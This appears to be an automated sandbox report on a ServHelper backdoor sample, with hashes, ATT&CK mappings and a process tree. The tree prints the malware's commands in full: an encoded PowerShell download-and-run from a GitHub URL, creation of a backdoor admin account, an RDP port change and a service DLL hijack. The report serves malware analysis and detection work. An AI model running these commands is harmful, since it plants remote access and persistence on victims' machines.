servhelper | d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8

Analysis

max time kernel
142s
max time network
132s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10-04-2024 14:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe
Size

6.0MB
MD5

86178014e457120d9dc6f6e27453338c
SHA1

16ab38c0e9c4516532f9d111523e948a6311bfc0
SHA256

d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8
SHA512

746417e600a1a0cb157f6a74422140b1ed75767a7f47f208c46feadac1dcf845637ce986a11cd7ed3f07e9782ff736b8da448057b0eb65cc50df30baa500bf75
SSDEEP

49152:+G6we2P/3W01/65p9CepD70BIme1AWwYg015Y5vl5zytq9oB5JSZZSYu5q01ka2i:+32P/d/s

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

7 1152 powershell.exe
8 1152 powershell.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid process

620 icacls.exe
1780 icacls.exe
3064 icacls.exe
2128 icacls.exe
2932 takeown.exe
2064 icacls.exe
2056 icacls.exe
1416 icacls.exe

flow	pid	process
7	1152	powershell.exe
8	1152	powershell.exe

pid	process
620	icacls.exe
1780	icacls.exe
3064	icacls.exe
2128	icacls.exe
2932	takeown.exe
2064	icacls.exe
2056	icacls.exe
1416	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

2228
2228
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

1780 icacls.exe
3064 icacls.exe
2128 icacls.exe
2932 takeown.exe
2064 icacls.exe
2056 icacls.exe
1416 icacls.exe
620 icacls.exe

pid	process
2228
2228

pid	process
1780	icacls.exe
3064	icacls.exe
2128	icacls.exe
2932	takeown.exe
2064	icacls.exe
2056	icacls.exe
1416	icacls.exe
620	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

6 raw.githubusercontent.com
7 raw.githubusercontent.com
8 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
6	raw.githubusercontent.com
7	raw.githubusercontent.com
8	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D0D8JV3N0L0QOU935WP2.temp	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

1996 WMIC.exe

pid	process
1996	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 0081f894528bda01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3052 reg.exe
Runs net.exe

pid	process
3052	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2900	powershell.exe
2304	powershell.exe
2684	powershell.exe
2296	powershell.exe
2900	powershell.exe
2900	powershell.exe
2900	powershell.exe
1152	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

472
2228
2228
2228
2228

pid	process
472
2228
2228
2228
2228

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1740	d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeDebugPrivilege	2684	powershell.exe
Token: SeDebugPrivilege	2296	powershell.exe
Token: SeRestorePrivilege	2056	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1996	WMIC.exe
Token: SeAuditPrivilege	1996	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1996	WMIC.exe
Token: SeAuditPrivilege	1996	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	792	WMIC.exe
Token: SeIncreaseQuotaPrivilege	792	WMIC.exe
Token: SeAuditPrivilege	792	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	792	WMIC.exe
Token: SeIncreaseQuotaPrivilege	792	WMIC.exe
Token: SeAuditPrivilege	792	WMIC.exe
Token: SeDebugPrivilege	1152	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exepowershell.execsc.exenet.execmd.execmd.exe

description	pid	process	target process
PID 1740 wrote to memory of 2900	1740	d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe	powershell.exe
PID 1740 wrote to memory of 2900	1740	d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe	powershell.exe
PID 1740 wrote to memory of 2900	1740	d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe	powershell.exe
PID 2900 wrote to memory of 2816	2900	powershell.exe	csc.exe
PID 2900 wrote to memory of 2816	2900	powershell.exe	csc.exe
PID 2900 wrote to memory of 2816	2900	powershell.exe	csc.exe
PID 2816 wrote to memory of 336	2816	csc.exe	cvtres.exe
PID 2816 wrote to memory of 336	2816	csc.exe	cvtres.exe
PID 2816 wrote to memory of 336	2816	csc.exe	cvtres.exe
PID 2900 wrote to memory of 2304	2900	powershell.exe	powershell.exe
PID 2900 wrote to memory of 2304	2900	powershell.exe	powershell.exe
PID 2900 wrote to memory of 2304	2900	powershell.exe	powershell.exe
PID 2900 wrote to memory of 2684	2900	powershell.exe	powershell.exe
PID 2900 wrote to memory of 2684	2900	powershell.exe	powershell.exe
PID 2900 wrote to memory of 2684	2900	powershell.exe	powershell.exe
PID 2900 wrote to memory of 2296	2900	powershell.exe	powershell.exe
PID 2900 wrote to memory of 2296	2900	powershell.exe	powershell.exe
PID 2900 wrote to memory of 2296	2900	powershell.exe	powershell.exe
PID 2900 wrote to memory of 2932	2900	powershell.exe	takeown.exe
PID 2900 wrote to memory of 2932	2900	powershell.exe	takeown.exe
PID 2900 wrote to memory of 2932	2900	powershell.exe	takeown.exe
PID 2900 wrote to memory of 2064	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 2064	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 2064	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 2056	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 2056	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 2056	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 1416	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 1416	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 1416	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 620	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 620	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 620	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 1780	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 1780	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 1780	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 3064	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 3064	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 3064	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 2128	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 2128	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 2128	2900	powershell.exe	icacls.exe
PID 2900 wrote to memory of 3060	2900	powershell.exe	reg.exe
PID 2900 wrote to memory of 3060	2900	powershell.exe	reg.exe
PID 2900 wrote to memory of 3060	2900	powershell.exe	reg.exe
PID 2900 wrote to memory of 3052	2900	powershell.exe	reg.exe
PID 2900 wrote to memory of 3052	2900	powershell.exe	reg.exe
PID 2900 wrote to memory of 3052	2900	powershell.exe	reg.exe
PID 2900 wrote to memory of 2092	2900	powershell.exe	reg.exe
PID 2900 wrote to memory of 2092	2900	powershell.exe	reg.exe
PID 2900 wrote to memory of 2092	2900	powershell.exe	reg.exe
PID 2900 wrote to memory of 2288	2900	powershell.exe	net.exe
PID 2900 wrote to memory of 2288	2900	powershell.exe	net.exe
PID 2900 wrote to memory of 2288	2900	powershell.exe	net.exe
PID 2288 wrote to memory of 996	2288	net.exe	net1.exe
PID 2288 wrote to memory of 996	2288	net.exe	net1.exe
PID 2288 wrote to memory of 996	2288	net.exe	net1.exe
PID 2900 wrote to memory of 392	2900	powershell.exe	cmd.exe
PID 2900 wrote to memory of 392	2900	powershell.exe	cmd.exe
PID 2900 wrote to memory of 392	2900	powershell.exe	cmd.exe
PID 392 wrote to memory of 748	392	cmd.exe	cmd.exe
PID 392 wrote to memory of 748	392	cmd.exe	cmd.exe
PID 392 wrote to memory of 748	392	cmd.exe	cmd.exe
PID 748 wrote to memory of 1500	748	cmd.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe
"C:\Users\Admin\AppData\Local\Temp\d541b9ff1fd68818abd9d0f70966e97beaab82dd6bb32d66566fbd6d657fbfd8.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2900
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xwl3ghhb.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2816
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFFE2.tmp"
      4⤵
      PID:336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2304
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2684
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2296
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2932
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2064
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2056
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1416
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:620
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1780
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3064
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2128
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3060
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:3052
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2092
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:996
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:392
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:748
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        
        PID:1500
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:1772
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    PID:2976
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      PID:1796
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        
        PID:2188
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:1788
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:2100
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:2704

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:564
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  PID:292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:2076

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc XUF75Tdb /add
1⤵
PID:2764
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc XUF75Tdb /add
  2⤵
  PID:1488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc XUF75Tdb /add
    3⤵
    PID:1292

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:1680
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:2192
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:2096

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" HSNHLVYA$ /ADD
1⤵
PID:1548
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" HSNHLVYA$ /ADD
  2⤵
  PID:2836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" HSNHLVYA$ /ADD
    3⤵
    PID:1324

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2940
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:2508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2492

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc XUF75Tdb
1⤵
PID:2388
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc XUF75Tdb
  2⤵
  PID:2408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc XUF75Tdb
    3⤵
    PID:2372

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:440
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1996

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2344
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:792

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2460
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1152

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES2.tmp

Filesize
1KB

MD5
f6ce1a26260500e7d3fdb5caa66daf01

SHA1
a503a62db2d56c0dd9aded1b86a9b914fba73327

SHA256
3a3b73cce8d6913f036b869e6eb0080b2c1d54a64037bc1b02ed7ee8059785c7

SHA512
8828f44dbca3dfd3fdc3a62c84e4dffaa12795d739ca3be3d118336ab37d867289d6a23cad44d3411b477512388dd2e0afdb11b1270f8a9c598afba74d249b2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
90c8165a2ca1c584008751e6604aac5f

SHA1
c1b2545af59ec7acdec29e91c667aa74a12b9742

SHA256
2099da06514de677962d66f90b822084878cd4d9bb9e62bfa8c4ed728ddfa974

SHA512
9d2e477e0b600ae0d82fac78bdabfdb005033c20e28d7c76fb48111a426e315e9bb7e8da5daeb2824dc92c5e084f52aa33c1d5e680fe566c3f21d96b838799a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\xwl3ghhb.dll

Filesize
3KB

MD5
b12f32572f894305e04d79a77095ae01

SHA1
0c19d756c3beadddd02661d21c2f242ccf27e817

SHA256
d90f937c74dfaed6ca1d216a4b4c05f9175eab392b9b91b50d22988bb5f6012b

SHA512
f2bfb85f2f8465e7bdccda0eb0503bf31b465ce8b10974584a9d56239dda6b58585cfa18d68d0bd73d05c147b990a9d0280b594ae8a09f8a18ee4f49ac4ea4ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\xwl3ghhb.pdb

Filesize
7KB

MD5
0f9525b8b1eb1d11e9384fda7375920b

SHA1
04a4f2831a1fc7bf9544bd4bdbd3849d31688dca

SHA256
e572804eff244f844f2d313e55dd1930932831263e09e25dd6a092ce3c9d97e0

SHA512
d586480d1c1465c7068dcf4bb964fc8bfcc2d0034fd39c6f44df9ede44e8d721eefe2977c44dce7e0467aa45e74fb5cb25b5933007a346fee637b938a9d87494

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ccd6e98386d1f5b7685ba2e22b3b4ebe

SHA1
7716109903168ea36aac5eff2473cb2cc6cb7506

SHA256
a7968cf0519814d8c80c5fa04d41beedfd7207062a44e1f638eb29924faf6f77

SHA512
72f17abf501f5c1b340de5ce68097cadb16b74c1dfa30dcb47413a61d58b79b392230b450f5968619eddbb658308c62862a6e3d7decc9137c7780111c7b65aa5

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCFFE2.tmp

Filesize
652B

MD5
13cd4c4e5861215497db89da8f940509

SHA1
55e37b0ad6b7064fa485cbc3fc0173139b023bd6

SHA256
f230c5725c335d0c6fa5f4e6e3500790018c6d87464f95a9f4f5ec45a7a500d3

SHA512
85582c5bb0e7e55c3a61dff3719ccfba6f0e3731240f3d7224c9c579f3496932efc8cf29177241f5a205a604fe84791952bec18fa3621cda2342818598d14fbb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xwl3ghhb.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xwl3ghhb.cmdline

Filesize
309B

MD5
dd2fd7da0e155ab81267dbd358c21c72

SHA1
b5b989209a2828c89532dba73c9fa04406aac893

SHA256
6ce790fc64005a72b5f2143c9d9da2f852a07a6882954b2f27ae66ef6ce8a0fb

SHA512
94a663854a217c8bcde034d209d8a21b4a18f5388d072deaafa01d0fe7546e547750010c4dab6e1391edbc5c68754acc5a0cd8e3f05e7aad78b050e232be01a3

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
615f99f0e93e2cc4c6a3a572835fd63d

SHA1
c383f93e9a47adc4d4b265fadfcc3feaf0980a91

SHA256
bc0a2d80569c16b63f59d629c91bfa40f76247e39c2a41dbffb0e41d1eea9ee8

SHA512
